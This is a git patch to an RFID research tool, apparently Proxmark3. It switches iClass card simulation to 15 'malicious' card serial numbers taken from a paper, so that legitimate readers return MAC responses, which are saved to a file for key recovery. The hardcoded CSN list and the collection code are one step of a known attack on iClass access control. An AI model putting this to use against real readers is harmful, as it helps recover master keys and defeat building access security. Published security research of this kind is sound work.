From 6116c7961889ab2e2c6821b3ac180d6ba71f9a2a Mon Sep 17 00:00:00 2001
From: Martin Holst Swende <martin@swende.se>
Date: Sun, 14 Dec 2014 21:37:56 +0100
Subject: [PATCH] Reverted to original malicious CSNs from paper, it appears
 legit readers does not accept if they dont end with F7,FF,12,E0

---
 armsrc/iclass.c            |  8 ++++----
 client/cmdhficlass.c       | 34 ++++++++++++++++++++++++++--------
 client/loclass/fileutils.c |  7 ++++---
 3 files changed, 34 insertions(+), 15 deletions(-)

diff --git a/armsrc/iclass.c b/armsrc/iclass.c
index 73036712..937edcb4 100644
--- a/armsrc/iclass.c
+++ b/armsrc/iclass.c
@@ -1004,7 +1004,7 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
 			// The usb data is 512 bytes, fitting 65 8-byte CSNs in there.
 
 			memcpy(csn_crc, datain+(i*8), 8);
-			if(doIClassSimulation(csn_crc,1,mac_responses))
+			if(doIClassSimulation(csn_crc,1,mac_responses+i*8))
 			{
 				return; // Button pressed
 			}
@@ -1132,7 +1132,6 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader
 		//Signal tracer
 		// Can be used to get a trigger for an oscilloscope..
 		LED_C_OFF();
-
 		if(!GetIClassCommandFromReader(receivedCmd, &len, 100)) {
 			buttonPressed = true;
 			break;
@@ -1175,9 +1174,10 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader
 			respsize = 0;
 			if (breakAfterMacReceived){
 				// dbprintf:ing ...
-				Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x",csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
+				Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x"
+						   ,csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
 				Dbprintf("RDR:  (len=%02d): %02x %02x %02x %02x %02x %02x %02x %02x %02x",len,
-						 receivedCmd[0], receivedCmd[1], receivedCmd[2],
+						receivedCmd[0], receivedCmd[1], receivedCmd[2],
 						receivedCmd[3], receivedCmd[4], receivedCmd[5],
 						receivedCmd[6], receivedCmd[7], receivedCmd[8]);
 				if (reader_mac_buf != NULL)
diff --git a/client/cmdhficlass.c b/client/cmdhficlass.c
index a59a9bac..d3d6e930 100644
--- a/client/cmdhficlass.c
+++ b/client/cmdhficlass.c
@@ -303,7 +303,7 @@ int CmdHFiClassSnoop(const char *Cmd)
   SendCommand(&c);
   return 0;
 }
-
+#define NUM_CSNS 15
 int CmdHFiClassSim(const char *Cmd)
 {
   uint8_t simType = 0;
@@ -340,10 +340,10 @@ int CmdHFiClassSim(const char *Cmd)
 
 	if(simType == 2)
 	{
-		UsbCommand c = {CMD_SIMULATE_TAG_ICLASS, {simType,8}};
+		UsbCommand c = {CMD_SIMULATE_TAG_ICLASS, {simType,NUM_CSNS}};
 		UsbCommand resp = {0};
 
-		uint8_t csns[64] = {
+		/*uint8_t csns[8 * NUM_CSNS] = {
 			 0x00,0x0B,0x0F,0xFF,0xF7,0xFF,0x12,0xE0 ,
 			 0x00,0x13,0x94,0x7e,0x76,0xff,0x12,0xe0 ,
 			 0x2a,0x99,0xac,0x79,0xec,0xff,0x12,0xe0 ,
@@ -352,8 +352,26 @@ int CmdHFiClassSim(const char *Cmd)
 			 0x4b,0x5e,0x0b,0x72,0xef,0xff,0x12,0xe0 ,
 			 0x00,0x73,0xd8,0x75,0x58,0xff,0x12,0xe0 ,
 			 0x0c,0x90,0x32,0xf3,0x5d,0xff,0x12,0xe0 };
-
-		memcpy(c.d.asBytes, csns, 64);
+*/
+      
+       uint8_t csns[8*NUM_CSNS] = {
+        0x00, 0x0B, 0x0F, 0xFF, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x04, 0x0E, 0x08, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x09, 0x0D, 0x05, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x0A, 0x0C, 0x06, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x0F, 0x0B, 0x03, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x08, 0x0A, 0x0C, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x0D, 0x09, 0x09, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x0E, 0x08, 0x0A, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x03, 0x07, 0x17, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x3C, 0x06, 0xE0, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x01, 0x05, 0x1D, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x02, 0x04, 0x1E, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x07, 0x03, 0x1B, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x00, 0x02, 0x24, 0xF7, 0xFF, 0x12, 0xE0,
+        0x00, 0x05, 0x01, 0x21, 0xF7, 0xFF, 0x12, 0xE0 };
+
+		memcpy(c.d.asBytes, csns, 8*NUM_CSNS);
 
 		SendCommand(&c);
 		if (!WaitForResponseTimeout(CMD_ACK, &resp, -1)) {
@@ -362,9 +380,9 @@ int CmdHFiClassSim(const char *Cmd)
 		}
 
 		uint8_t num_mac_responses  = resp.arg[1];
-		PrintAndLog("Mac responses: %d MACs obtained (should be 8)", num_mac_responses);
+		PrintAndLog("Mac responses: %d MACs obtained (should be %d)", num_mac_responses,NUM_CSNS);
 
-		size_t datalen = 8*24;
+		size_t datalen = NUM_CSNS*24;
 		/*
 		 * Now, time to dump to file. We'll use this format:
 		 * <8-byte CSN><8-byte CC><4 byte NR><4 byte MAC>....
@@ -378,7 +396,7 @@ int CmdHFiClassSim(const char *Cmd)
 		void* dump = malloc(datalen);
 		memset(dump,0,datalen);//<-- Need zeroes for the CC-field
 		uint8_t i = 0;
-		for(i = 0 ; i < 8 ; i++)
+		for(i = 0 ; i < NUM_CSNS ; i++)
 		{
 			memcpy(dump+i*24, csns+i*8,8); //CSN
 			//8 zero bytes here...
diff --git a/client/loclass/fileutils.c b/client/loclass/fileutils.c
index 8c08c9ee..255aa313 100644
--- a/client/loclass/fileutils.c
+++ b/client/loclass/fileutils.c
@@ -18,7 +18,7 @@ int fileExists(const char *filename) {
 
 int saveFile(const char *preferredName, const char *suffix, const void* data, size_t datalen)
 {
-	int size = sizeof(char) * (strlen(preferredName)+strlen(suffix)+5);
+	int size = sizeof(char) * (strlen(preferredName)+strlen(suffix)+10);
 	char * fileName = malloc(size);
 
 	memset(fileName,0,size);
@@ -34,13 +34,14 @@ int saveFile(const char *preferredName, const char *suffix, const void* data, si
 	/*Opening file for writing in binary mode*/
 	FILE *fileHandle=fopen(fileName,"wb");
 	if(!fileHandle) {
-		prnlog("Failed to write to file '%s'", fileName);
+		PrintAndLog("Failed to write to file '%s'", fileName);
 		free(fileName);
 		return 1;
 	}
 	fwrite(data, 1,	datalen, fileHandle);
 	fclose(fileHandle);
-	prnlog("Saved data to '%s'", fileName);
+	PrintAndLog(">Saved data to '%s'", fileName);
+
 	free(fileName);
 
 	return 0;
-- 
2.39.5